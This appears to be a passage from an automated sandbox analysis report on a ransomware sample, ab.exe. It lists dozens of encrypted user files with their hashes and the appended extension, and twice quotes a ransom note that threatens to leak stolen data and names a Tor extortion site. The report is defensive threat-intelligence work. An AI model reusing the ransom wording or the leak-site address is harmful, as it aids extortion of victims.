                        Malicious:false
                        C:\Users\user\Documents\PALRGUCVEH.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979224689359224
                        Encrypted:false
                        SSDEEP:192:G/UbDx61spAWmdbJA0GdY0hi4isXb3EqKfbQz8V+n:WkAam5JA0GvTnDzd
                        MD5:802C203B29D025FEC9BB25C066F739A2
                        SHA1:47659324F6263A6C875F5946FE84B9A092FA6B84
                        SHA-256:0359E5B3909D3DD795479C944783EE95C7BDE7D08B1E7C9069F12B50D3EC2AFC
                        SHA-512:DD4E02D09F09BEAB80336A17639D5722D6609C2AC699B49426408C8C67AF2B8ECECFEE0AE1B515D31E1AF4DFAB3462D54FDC4358C3463036F6FC1DBCDA620BDB
                        Malicious:false
                        C:\Users\user\Documents\PWCCAWLGRE.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977419764888379
                        Encrypted:false
                        SSDEEP:192:qtUahdrxCzooIhTnc+b3fxghDJc9hGPJFkwr2nwx+9vTV+n:gUUdrxCMRc+4nPJOwrGwx+9vk
                        MD5:96A61E76383B49B4DF4BF665094E724A
                        SHA1:0E965FBB4A4CBC1C7060756AB264EFA572CFFD38
                        SHA-256:5472BBC446E7245EA82B86651382A5F82F9F67FDFCF6C371CE708EA784DC5FAF
                        SHA-512:A26587035C66AC3292A8DA70DFFBC36E45343E2A35F938BD7E0227FAEFC4614CB470E8224619405C925EDFBEB285B4D4585BA242A3A6A15DF7694A4741AB74B3
                        Malicious:false
                        C:\Users\user\Documents\PWCCAWLGRE.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977419764888379
                        Encrypted:false
                        SSDEEP:192:qtUahdrxCzooIhTnc+b3fxghDJc9hGPJFkwr2nwx+9vTV+n:gUUdrxCMRc+4nPJOwrGwx+9vk
                        MD5:96A61E76383B49B4DF4BF665094E724A
                        SHA1:0E965FBB4A4CBC1C7060756AB264EFA572CFFD38
                        SHA-256:5472BBC446E7245EA82B86651382A5F82F9F67FDFCF6C371CE708EA784DC5FAF
                        SHA-512:A26587035C66AC3292A8DA70DFFBC36E45343E2A35F938BD7E0227FAEFC4614CB470E8224619405C925EDFBEB285B4D4585BA242A3A6A15DF7694A4741AB74B3
                        Malicious:false
                        C:\Users\user\Documents\QCFWYSKMHA.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9812980140579235
                        Encrypted:false
                        SSDEEP:192:Fn/IhGIxJ0DSaaeBFO3KfbPotQfn2k95Oih7BRV+n:5IODdaeB06DPUy/u
                        MD5:5FD3B283B515104AE6D9D1216008789C
                        SHA1:E636BCED13ABB17638EDCBB87ECEF8707E925BCA
                        SHA-256:E731D0751B6422A7797D8F4B74F1574378D0D1A199A98353C0C3B5C903F7E681
                        SHA-512:ED10921BBDE1DE23F8527F3C5F2299F9B834EB05EEA9C63B20984C5DB92B026410F67DDB88A454D135CEBD98171E7DCE45AB55B4937B15DD7E37999286F63059
                        Malicious:false
                        C:\Users\user\Documents\QCFWYSKMHA.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9812980140579235
                        Encrypted:false
                        SSDEEP:192:Fn/IhGIxJ0DSaaeBFO3KfbPotQfn2k95Oih7BRV+n:5IODdaeB06DPUy/u
                        MD5:5FD3B283B515104AE6D9D1216008789C
                        SHA1:E636BCED13ABB17638EDCBB87ECEF8707E925BCA
                        SHA-256:E731D0751B6422A7797D8F4B74F1574378D0D1A199A98353C0C3B5C903F7E681
                        SHA-512:ED10921BBDE1DE23F8527F3C5F2299F9B834EB05EEA9C63B20984C5DB92B026410F67DDB88A454D135CEBD98171E7DCE45AB55B4937B15DD7E37999286F63059
                        Malicious:false
                        C:\Users\user\Documents\QCFWYSKMHA.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978609401749966
                        Encrypted:false
                        SSDEEP:192:47CFQrbKGnx2ZSMYv1VHvT/81SRWazn0OKEHMz00nQgLd4OV+n:43rbqxGzTfDnb/HTWXdw
                        MD5:5624F35BC79506D8A8957BD204ADB7B6
                        SHA1:4F19BAE79CDBDB015FC01EE6EE095F5239CEEAF5
                        SHA-256:7E73627B1633B11DDBC0F961755B7B52D13A4384EA87ABF8B0D3BD8952335161
                        SHA-512:1CE81F2BB979F4380FC84364E5915CFD554460394BFB6A0297A1015B820CA9757338365EC006F0FD291636713091B488983088DF252E2EB8CC5B85358C543AEF
                        Malicious:false
                        C:\Users\user\Documents\QCFWYSKMHA.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978609401749966
                        Encrypted:false
                        SSDEEP:192:47CFQrbKGnx2ZSMYv1VHvT/81SRWazn0OKEHMz00nQgLd4OV+n:43rbqxGzTfDnb/HTWXdw
                        MD5:5624F35BC79506D8A8957BD204ADB7B6
                        SHA1:4F19BAE79CDBDB015FC01EE6EE095F5239CEEAF5
                        SHA-256:7E73627B1633B11DDBC0F961755B7B52D13A4384EA87ABF8B0D3BD8952335161
                        SHA-512:1CE81F2BB979F4380FC84364E5915CFD554460394BFB6A0297A1015B820CA9757338365EC006F0FD291636713091B488983088DF252E2EB8CC5B85358C543AEF
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979463294113997
                        Encrypted:false
                        SSDEEP:192:b4GMRxHtVFjGSYHhDnyVl8wFbrk7/Aa4O1687azYXqQbV+n:lstXUBDyVld0o8/Xc
                        MD5:C511238F63F4E9BB0F8C1BA74058FF52
                        SHA1:D0E311F82D9AE1DB8FB148268DAAB3C20A4F3753
                        SHA-256:0429A55E4AF9F39872525B4271F91F4A04E4FD1D15279C51AFFD26743593CBFF
                        SHA-512:8D2B37514331D96D9924B957DF81F9AB83437B96EC3E25A7CD8D23827E17C6C50933E8522B95AA02E395420008B5F6AC9E78E3EE8F81A1FA7DFA27C9A7519683
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979463294113997
                        Encrypted:false
                        SSDEEP:192:b4GMRxHtVFjGSYHhDnyVl8wFbrk7/Aa4O1687azYXqQbV+n:lstXUBDyVld0o8/Xc
                        MD5:C511238F63F4E9BB0F8C1BA74058FF52
                        SHA1:D0E311F82D9AE1DB8FB148268DAAB3C20A4F3753
                        SHA-256:0429A55E4AF9F39872525B4271F91F4A04E4FD1D15279C51AFFD26743593CBFF
                        SHA-512:8D2B37514331D96D9924B957DF81F9AB83437B96EC3E25A7CD8D23827E17C6C50933E8522B95AA02E395420008B5F6AC9E78E3EE8F81A1FA7DFA27C9A7519683
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980350636427151
                        Encrypted:false
                        SSDEEP:192:CshZ5RiqVHqB4Xbo3Cy9bgqmbCgKZLkMSEVaOgV+n:CshZrJ0BCbobbgrGkyos
                        MD5:E888844640E13228E8E4DB5737FF4392
                        SHA1:A8E18884FFCA160732F905ABE2761DE217C4F1FB
                        SHA-256:B80D2053F73A526210889E445752516A7F91943AE996B659C00AF4D6F652319A
                        SHA-512:702F7E2BE5247482EF71321DD0CE882664ABBFAE15FF9843B55C977610EC76A9EFAB30DA595A035A392587993D10F2990189B1DE16BBFD7D6EF4178AD0BEE1F8
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980350636427151
                        Encrypted:false
                        SSDEEP:192:CshZ5RiqVHqB4Xbo3Cy9bgqmbCgKZLkMSEVaOgV+n:CshZrJ0BCbobbgrGkyos
                        MD5:E888844640E13228E8E4DB5737FF4392
                        SHA1:A8E18884FFCA160732F905ABE2761DE217C4F1FB
                        SHA-256:B80D2053F73A526210889E445752516A7F91943AE996B659C00AF4D6F652319A
                        SHA-512:702F7E2BE5247482EF71321DD0CE882664ABBFAE15FF9843B55C977610EC76A9EFAB30DA595A035A392587993D10F2990189B1DE16BBFD7D6EF4178AD0BEE1F8
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\EFOYFBOLXA.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977205884376791
                        Encrypted:false
                        SSDEEP:192:h+4iZTnNsDoshPHkczpCkqj31d5AhlFWkFtYm0fjswxGNikcFKoESj2JV+n:qZ7ODdhvhzpFqjFrcrFWfjswxAikcFKG
                        MD5:C762250734B9B9DC82F559E378A1D773
                        SHA1:BCC3B4F8608C200C4EB4A7B7AA0FB0413262F53D
                        SHA-256:B25655F5FE5AD2A4F332A1B9863DE60759F429FEFA7FAC98FC88042F59C05986
                        SHA-512:AD4EF2E819ADACC4755F5BE80CBECC13D0D658CD0754C90243197920447C4154E882F11BB407F523FDC8A85E6707CE1C4FC154EBD6A385F1CC16BDA6FCE1758B
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\EFOYFBOLXA.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977205884376791
                        Encrypted:false
                        SSDEEP:192:h+4iZTnNsDoshPHkczpCkqj31d5AhlFWkFtYm0fjswxGNikcFKoESj2JV+n:qZ7ODdhvhzpFqjFrcrFWfjswxAikcFKG
                        MD5:C762250734B9B9DC82F559E378A1D773
                        SHA1:BCC3B4F8608C200C4EB4A7B7AA0FB0413262F53D
                        SHA-256:B25655F5FE5AD2A4F332A1B9863DE60759F429FEFA7FAC98FC88042F59C05986
                        SHA-512:AD4EF2E819ADACC4755F5BE80CBECC13D0D658CD0754C90243197920447C4154E882F11BB407F523FDC8A85E6707CE1C4FC154EBD6A385F1CC16BDA6FCE1758B
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\PALRGUCVEH.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975836604523676
                        Encrypted:false
                        SSDEEP:192:nkt38m7VSmGApGESO+imeL+6qMf5zvYaPc4i+x16n0BK4PVIq2nIpTfV+n:n4LfpGEQ3f63fJgK19X40Ec2ItI
                        MD5:00B1CCD919E5E7D538CBB904EE5F9972
                        SHA1:68E2E7A275AF86FC1FC049001009B6E1047D23B9
                        SHA-256:4C76403EA5A86ACA8441EDEA8286D472D1911A0EE350B645DB2265FECD639DD5
                        SHA-512:C5646F45D27B3EBD18CEAB60FCDE69696ED8B6FB7E0A4F9F34A6D9751524AA71CCE0225A585BCEF50BCD66180CD23E4BEDEB81A795CE2EAA2CAC039AE57F7E1B
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\PALRGUCVEH.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975836604523676
                        Encrypted:false
                        SSDEEP:192:nkt38m7VSmGApGESO+imeL+6qMf5zvYaPc4i+x16n0BK4PVIq2nIpTfV+n:n4LfpGEQ3f63fJgK19X40Ec2ItI
                        MD5:00B1CCD919E5E7D538CBB904EE5F9972
                        SHA1:68E2E7A275AF86FC1FC049001009B6E1047D23B9
                        SHA-256:4C76403EA5A86ACA8441EDEA8286D472D1911A0EE350B645DB2265FECD639DD5
                        SHA-512:C5646F45D27B3EBD18CEAB60FCDE69696ED8B6FB7E0A4F9F34A6D9751524AA71CCE0225A585BCEF50BCD66180CD23E4BEDEB81A795CE2EAA2CAC039AE57F7E1B
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979500254747108
                        Encrypted:false
                        SSDEEP:96:Q9bXQRBEwOE5Ym9nN+QAAyjUgZqSGVgUZXKl6gapThme6CURSU74eRfvqzdLSKm1:O+G27UZqSCfmO8e6CUkU9EdLSK15vV+n
                        MD5:B15E29F1FDBB2ABCFF12804D4E4D00AE
                        SHA1:AE6E4B70766FC95F65627C070E95E888D5CF1FEE
                        SHA-256:5EDC3B4C729990C19367D07ADCD2A139DCFB4B92EFD8978FD9544A1761160FBD
                        SHA-512:F3D69EA24FA3D751B320CFFC5C64F658A19C226B92B09BDF863FEE829268473F71A7D27301FC41D94C74E920E67ED0E4C881277308623F24D59A41D1C8153D66
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979500254747108
                        Encrypted:false
                        SSDEEP:96:Q9bXQRBEwOE5Ym9nN+QAAyjUgZqSGVgUZXKl6gapThme6CURSU74eRfvqzdLSKm1:O+G27UZqSCfmO8e6CUkU9EdLSK15vV+n
                        MD5:B15E29F1FDBB2ABCFF12804D4E4D00AE
                        SHA1:AE6E4B70766FC95F65627C070E95E888D5CF1FEE
                        SHA-256:5EDC3B4C729990C19367D07ADCD2A139DCFB4B92EFD8978FD9544A1761160FBD
                        SHA-512:F3D69EA24FA3D751B320CFFC5C64F658A19C226B92B09BDF863FEE829268473F71A7D27301FC41D94C74E920E67ED0E4C881277308623F24D59A41D1C8153D66
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\SQSJKEBWDT.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9770356142388525
                        Encrypted:false
                        SSDEEP:192:hfpGw0KRrDy4F0keQuSqvwfQOkr1m0uKwyu7zSR3LKoE6+yqaPlV+n:ZpGQF0keQu/vV1mFKw9qR3L7PFi
                        MD5:4F75E5FEEE8DC5C49FC06E6244575C79
                        SHA1:524C8721F5841DEDF7C80065F00A21A7BF79682F
                        SHA-256:8929A2D6310DC164C045E2671C358F50D4E051E136CFF6016753027044796F9E
                        SHA-512:2E15DF498052543224B52F37890B0978003BB7A541E8B75FF78906A3E112F0F5C2094B099A0FA9D56F20FAFCA24447F3111461456F82C6556EE24070B3D3D1AD
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\SQSJKEBWDT.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9770356142388525
                        Encrypted:false
                        SSDEEP:192:hfpGw0KRrDy4F0keQuSqvwfQOkr1m0uKwyu7zSR3LKoE6+yqaPlV+n:ZpGQF0keQu/vV1mFKw9qR3L7PFi
                        MD5:4F75E5FEEE8DC5C49FC06E6244575C79
                        SHA1:524C8721F5841DEDF7C80065F00A21A7BF79682F
                        SHA-256:8929A2D6310DC164C045E2671C358F50D4E051E136CFF6016753027044796F9E
                        SHA-512:2E15DF498052543224B52F37890B0978003BB7A541E8B75FF78906A3E112F0F5C2094B099A0FA9D56F20FAFCA24447F3111461456F82C6556EE24070B3D3D1AD
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\SUAVTZKNFL.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980628590509694
                        Encrypted:false
                        SSDEEP:192:MAnhbq10pPlCWsjMTuvm4nqEcdZETDJi+wYjQYy8uKO53uUXEORV+n:M2hbqSpNHPTuZqNdZETDhyok3xW
                        MD5:6A61C54C3E0F4E8640132FD9D3A09A96
                        SHA1:2137D59558C0F728705CFCF38EEB2F85639AF046
                        SHA-256:86BE7102BC664185C0C4467443BF41731F9F58AF8BDA2DD4F35E1AB8658530E3
                        SHA-512:B96829B08114408DD4EEBE092EAE88DD386E8CD32F3D100F8678EBC0F8A244018ADA0056334A95BA8E49ADA701A8955CAD4E52C7B3F174BB5E00D99E11B2793E
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\SUAVTZKNFL.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980628590509694
                        Encrypted:false
                        SSDEEP:192:MAnhbq10pPlCWsjMTuvm4nqEcdZETDJi+wYjQYy8uKO53uUXEORV+n:M2hbqSpNHPTuZqNdZETDhyok3xW
                        MD5:6A61C54C3E0F4E8640132FD9D3A09A96
                        SHA1:2137D59558C0F728705CFCF38EEB2F85639AF046
                        SHA-256:86BE7102BC664185C0C4467443BF41731F9F58AF8BDA2DD4F35E1AB8658530E3
                        SHA-512:B96829B08114408DD4EEBE092EAE88DD386E8CD32F3D100F8678EBC0F8A244018ADA0056334A95BA8E49ADA701A8955CAD4E52C7B3F174BB5E00D99E11B2793E
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\ZGGKNSUKOP.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97988361903147
                        Encrypted:false
                        SSDEEP:192:ZAOCxlGWaQdXjlSPfkOYOY6TRdlvrcuAaNqBMMVhGbOVV+n:ZAOCxwW5dzkE/OYMGxBGbOq
                        MD5:FE81CBE988054614769F9A0DCBB60BC5
                        SHA1:55AE2908B12975EC220B27B61B18C2FAD1193AB2
                        SHA-256:2E419BBE6E1F32FB20DC27B3381AB2C87CB3B24CC4A2CFA949EDE55F6C18B194
                        SHA-512:57729BCB5DF1670A6F8FE7F127B9D8CE8A0B41539C4F0209D24A93E39BC387C7C430F03551727C674BA4A942BCEF1621566AD3403AD31059C77E1E842E208B84
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\ZGGKNSUKOP.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97988361903147
                        Encrypted:false
                        SSDEEP:192:ZAOCxlGWaQdXjlSPfkOYOY6TRdlvrcuAaNqBMMVhGbOVV+n:ZAOCxwW5dzkE/OYMGxBGbOq
                        MD5:FE81CBE988054614769F9A0DCBB60BC5
                        SHA1:55AE2908B12975EC220B27B61B18C2FAD1193AB2
                        SHA-256:2E419BBE6E1F32FB20DC27B3381AB2C87CB3B24CC4A2CFA949EDE55F6C18B194
                        SHA-512:57729BCB5DF1670A6F8FE7F127B9D8CE8A0B41539C4F0209D24A93E39BC387C7C430F03551727C674BA4A942BCEF1621566AD3403AD31059C77E1E842E208B84
                        Malicious:false
                        C:\Users\user\Documents\QNCYCDFIJJ\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:dropped
                        Size (bytes):3770
                        Entropy (8bit):5.7317553348625525
                        Encrypted:false
                        SSDEEP:48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69G:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USi
                        MD5:6D616A18BE7BFF4DDB438785DE3785A4
                        SHA1:889F82D417D1C422CD952E12E1778B97A35CC75F
                        SHA-256:EA4CE46289FB3149D92A3F9B63C2B47535FE4635F440063FD9706BCB1ABDCF4A
                        SHA-512:0553ABBB233A30AC8C4940DDDAE51590541DD3744D14C65A27DD87729EE4E4E45DE86489565DCB05CE71F9D6D0136FB68426EFF190F83AB9FEC1EA43044E31F1
                        Malicious:true
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        C:\Users\user\Documents\SQSJKEBWDT.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9765370001668146
                        Encrypted:false
                        SSDEEP:192:R+fTV53ICiwpgJzbwl8K/59xb9FxQu/sUTSXaV+n:CVtIrwpgJzkllLxZFxQu/v+
                        MD5:C0B72A33FA9063A713EDCE9571C33CA9
                        SHA1:18C03822990B550B20A88783C73B4FA30069B48C
                        SHA-256:467FDF3BBFACA1C6DB4CFD374F16DFF33CF043778EFFE2C8B67D49A53C949F43
                        SHA-512:9A4CEDA1508F62239B559F4D010AC0DB6ECACC0E50CC0DA09BA8E91A44B6E021905179A1CB580F92345DFF4BE3527C269F3F01C532275C80BBEAC3176299CE0B
                        Malicious:false
                        C:\Users\user\Documents\SQSJKEBWDT.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9765370001668146
                        Encrypted:false
                        SSDEEP:192:R+fTV53ICiwpgJzbwl8K/59xb9FxQu/sUTSXaV+n:CVtIrwpgJzkllLxZFxQu/v+
                        MD5:C0B72A33FA9063A713EDCE9571C33CA9
                        SHA1:18C03822990B550B20A88783C73B4FA30069B48C
                        SHA-256:467FDF3BBFACA1C6DB4CFD374F16DFF33CF043778EFFE2C8B67D49A53C949F43
                        SHA-512:9A4CEDA1508F62239B559F4D010AC0DB6ECACC0E50CC0DA09BA8E91A44B6E021905179A1CB580F92345DFF4BE3527C269F3F01C532275C80BBEAC3176299CE0B
                        Malicious:false
                        C:\Users\user\Documents\SUAVTZKNFL.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978184048743922
                        Encrypted:false
                        SSDEEP:192:/fXEqrBAZysA0yU+xMFxG8I3C26olxd7Imm+dNpI4nRB++YPpikV+n:/PEqmZysWyFxZp27VR1nRB+jPe
                        MD5:00492C52D1E10DDF101792F28F99C974
                        SHA1:313B5B8BDF3751328AE8B7DA10FF53C9FBF71EFC
                        SHA-256:536CBBC23CA7EAD86271CC75309842142D3901A5E70FDCA454BE2916EB1D0975
                        SHA-512:86C5012E6CD02AE81BC58EE9408769DCEF4CB9FF9299DEA3B78FB4827B8B0AD30160BE2833FAB34B552B146D35324C3E68808620D9A5A4BD064DB8AA8F093BC1
                        Malicious:false
                        C:\Users\user\Documents\SUAVTZKNFL.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978184048743922
                        Encrypted:false
                        SSDEEP:192:/fXEqrBAZysA0yU+xMFxG8I3C26olxd7Imm+dNpI4nRB++YPpikV+n:/PEqmZysWyFxZp27VR1nRB+jPe
                        MD5:00492C52D1E10DDF101792F28F99C974
                        SHA1:313B5B8BDF3751328AE8B7DA10FF53C9FBF71EFC
                        SHA-256:536CBBC23CA7EAD86271CC75309842142D3901A5E70FDCA454BE2916EB1D0975
                        SHA-512:86C5012E6CD02AE81BC58EE9408769DCEF4CB9FF9299DEA3B78FB4827B8B0AD30160BE2833FAB34B552B146D35324C3E68808620D9A5A4BD064DB8AA8F093BC1
                        Malicious:false
                        C:\Users\user\Documents\SUAVTZKNFL.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979000801964847
                        Encrypted:false
                        SSDEEP:192:Hx8H4WGO5r7TW1m6fkJYGPzlnDC3tLGo2V+n:cN5r7TW1tf1G7lnD9oz
                        MD5:CA237FC6EF8D39A4EA46A90E1DC17D92
                        SHA1:28F416365817A282F7D2E09A28EFDD525A616A3E
                        SHA-256:ACB4F2A8DB37F89470D8501C1CF60B46D9BF8A1916221F20FAE86D78274C5DA3
                        SHA-512:B3CDB49C6AAACB2723497BE8487EC381B4FC3232DBA2DDB346A90496016586716C8CECF9AB8D7F256B88A97EFC6B18FFB53FE545DCC5E7250A95EE4CD2C05555
                        Malicious:false
                        C:\Users\user\Documents\SUAVTZKNFL.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979000801964847
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Documents\ZGGKNSUKOP.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977493913946599
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Documents\ZGGKNSUKOP.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977493913946599
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Documents\ZQIXMVQGAH.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980183607368493
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Documents\ZQIXMVQGAH.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980183607368493
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Documents\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:dropped
                        Size (bytes):3754
                        Entropy (8bit):5.729372205750946
                        Encrypted:false
                        Malicious:false
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        C:\Users\user\Downloads\BNAGMGSPLO.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9768802738462155
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Downloads\BNAGMGSPLO.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9768802738462155
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Downloads\EEGWXUHVUG.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980925782067969
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Downloads\EEGWXUHVUG.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980925782067969
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Downloads\EFOYFBOLXA.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979635540531903
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Downloads\EFOYFBOLXA.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979635540531903
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Downloads\EFOYFBOLXA.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9794071186885285
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Downloads\EFOYFBOLXA.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9794071186885285
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Downloads\GAOBCVIQIJ.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978610559494473
                        Encrypted:false
                        Malicious:false
